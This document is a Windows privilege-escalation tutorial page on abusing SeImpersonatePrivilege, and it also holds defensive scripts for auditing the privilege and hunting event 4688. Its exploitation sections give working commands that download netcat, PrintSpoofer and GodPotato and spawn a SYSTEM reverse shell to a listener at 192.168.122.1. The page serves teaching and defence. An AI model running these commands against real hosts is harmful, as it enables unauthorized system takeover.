# 4 - SeImpersonatePrivilege Exploitation

#### Topics

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **What is [SeImpersonatePrivilege](https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege)?**

The `SeImpersonatePrivilege`, or "Impersonate a client after authentication," is a user right in Windows that allows programs running on behalf of a user to impersonate another client.

This privilege is primarily used in client-server scenarios, enabling a server process to impersonate the client process to perform tasks on its behalf.

### **Security Implications**

If an attacker has the `SeImpersonatePrivilege`, they can:

* Create a service to trick clients into connecting to it.
* Impersonate the connected client’s privileges, potentially escalating their own access to SYSTEM.\
  This makes `SeImpersonatePrivilege` a common target in privilege escalation attacks.

***

### **Checking for SeImpersonatePrivilege**

To verify whether the current user has this privilege, run the following:

```powershell
whoami /priv
```

**Sample Output**

```
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
```

If the `SeImpersonatePrivilege` is enabled, the user can exploit it for privilege escalation using tools like **PrintSpoofer** or **GodPotato**.

***

### **Assigning SeImpersonatePrivilege**

If you want to assign the `SeImpersonatePrivilege` to a user:

1. Open the **Local Group Policy Editor**:
   * Navigate to:\
     `Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment`.
   * Locate *"Impersonate a client after authentication."*
2. Right-click and select **Properties**, then click **Add User or Group**.
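
From the defender's side, the same user right can be audited host-wide instead of one token at a time. The following script is an added example (not from the original page or from Microsoft) that exports the local security policy with `secedit`, resolves every holder of `SeImpersonatePrivilege`, and marks any account that is not one of the documented defaults for review; the function name `Get-SeImpersonateHolders` and the `$DefaultHolders` list are this example's own choices.

```powershell
# Added example, not part of the original page: list which accounts hold
# SeImpersonatePrivilege on this host and flag holders outside the Windows
# defaults. Requires an elevated session, because secedit needs admin rights.
function Get-SeImpersonateHolders {
    $inf = Join-Path $env:TEMP 'secpol-export.inf'
    # Export the local security policy; the [Privilege Rights] section lists each
    # user right as "SeXxxPrivilege = *SID,*SID,..." (plain names carry no '*').
    & secedit.exe /export /cfg $inf /quiet | Out-Null
    if (-not (Test-Path -Path $inf)) { throw 'secedit export failed; run from an elevated session' }
    $line = Get-Content -Path $inf | Where-Object { $_ -match '^\s*SeImpersonatePrivilege\s*=' } | Select-Object -First 1
    Remove-Item -Path $inf -ErrorAction SilentlyContinue
    if (-not $line) { return }   # no entry at all means no account holds the right

    foreach ($entry in (($line -split '=', 2)[1] -split ',')) {
        $entry = $entry.Trim()
        if (-not $entry) { continue }
        try {
            if ($entry.StartsWith('*')) {
                # SID form: resolve it to an account name for readability
                $sid  = New-Object System.Security.Principal.SecurityIdentifier($entry.Substring(1))
                $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
            } else {
                # Name form: resolve it to a SID so the default check below works
                $name = $entry
                $sid  = (New-Object System.Security.Principal.NTAccount($entry)).Translate([System.Security.Principal.SecurityIdentifier])
            }
            $sidValue = $sid.Value
        } catch {
            $name = $entry; $sidValue = '<unresolved>'
        }
        [pscustomobject]@{ Sid = $sidValue; Account = $name }
    }
}

# Holders documented by Microsoft as defaults: Administrators, SERVICE, LOCAL SERVICE,
# NETWORK SERVICE; IIS additionally grants IIS_IUSRS. Other products (SQL Server, etc.)
# may legitimately add their service accounts, so "REVIEW" means check, not remove.
$DefaultHolders = @('S-1-5-32-544', 'S-1-5-6', 'S-1-5-19', 'S-1-5-20', 'S-1-5-32-568')

Get-SeImpersonateHolders | ForEach-Object {
    $status = if ($DefaultHolders -contains $_.Sid) { 'default' } else { 'REVIEW' }
    '{0,-8} {1,-14} {2}' -f $status, $_.Sid, $_.Account
}
```

Any web or database service account that shows up as `REVIEW` is exactly the kind of foothold the tools below are built for, so it is the account whose exposure should be reduced first.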

***

## **Privilege Escalation with SeImpersonatePrivilege**

### **Initial Setup**

1. **Start a Listener on the Attacker Machine**

   ```bash
   nc -lvnp 5555
   ```
2. **Download Netcat on the Victim Machine**

   ```powershell
   iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe
   ```

***

### **Exploiting with PrintSpoofer**

**PrintSpoofer** leverages misconfigured print spooler services to escalate privileges to SYSTEM.

1. **Download the Exploit**

   ```powershell
   iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
   ```
2. **Execute the Exploit**\
   Run the following command to establish a SYSTEM shell:

   ```powershell
   PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
   ```

***

### **Exploiting with GodPotato**

**GodPotato** is a tool that exploits COM and DCOM misconfigurations to achieve SYSTEM privileges.

1. **Identify .NET Framework Version**\
   Use the following command to determine the .NET version installed:

   ```powershell
   reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
   ```
2. **Download the Appropriate GodPotato Version**\
   Depending on the .NET version:
   * **.NET 2.0**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
     ```
   * **.NET 3.5**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe
     ```
   * **.NET 4.0**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe
     ```
3. **Execute the Exploit**\
   Use the appropriate executable to escalate privileges and spawn a reverse shell:

   ```powershell
   .\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
   ```
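
Both PrintSpoofer and GodPotato end the same way: a process owned by a low-privileged service account creates a new process under a SYSTEM token. In Security event 4688 that shows up as a Creator Subject that differs from the Target Subject, which makes it a practical hunting signal. The script below is an added example (not from the page or from either tool's project) that pulls recent 4688 events and reports creations where a non-SYSTEM creator spawned a SYSTEM process; it assumes "Audit Process Creation" (ideally with command-line logging) is enabled, and the function name `Find-TokenMismatchProcessStarts` is this example's own.

```powershell
# Added example, not part of the original page: hunt Security event 4688 for
# process creations whose token (Target Subject) is SYSTEM while the creating
# process (Creator Subject) is not. Run from an elevated session.
function Find-TokenMismatchProcessStarts {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Read the named EventData fields from the event XML instead of relying
        # on positional Properties, which shift between Windows versions.
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        # Target fields are only meaningful when the new process runs under a
        # token other than the creator's. SYSTEM spawning SYSTEM is normal;
        # LOCAL SERVICE, NETWORK SERVICE or an IIS app pool spawning SYSTEM is not.
        if ($data.TargetUserSid -eq 'S-1-5-18' -and $data.SubjectUserSid -ne 'S-1-5-18') {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Creator = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
                RunsAs  = "$($data.TargetDomainName)\$($data.TargetUserName)"
                Parent  = $data.ParentProcessName
                Process = $data.NewProcessName
                Command = $data.CommandLine
            }
        }
    }
}

Find-TokenMismatchProcessStarts -Hours 24 | Format-Table -AutoSize
```

Expect a short list on a healthy host; a `cmd.exe` or unfamiliar binary in `Process` whose `Creator` is a service account and whose `Parent` lives in a user-writable directory is the pattern worth escalating to incident response.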

***

## **Other Resources**

* [SeImpersonatePrivilege - Microsoft Doc](https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege)
* [Juggernaut Security](https://juggernaut-sec.com/seimpersonateprivilege/)
* [FoxGlove Security](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
* [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)
* [GodPotato](https://github.com/BeichenDream/GodPotato)

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!**❗
{% endhint %}
